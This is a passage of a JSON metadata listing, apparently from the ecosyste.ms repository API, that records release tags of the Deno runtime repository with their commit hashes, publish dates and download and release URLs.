pendencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/Git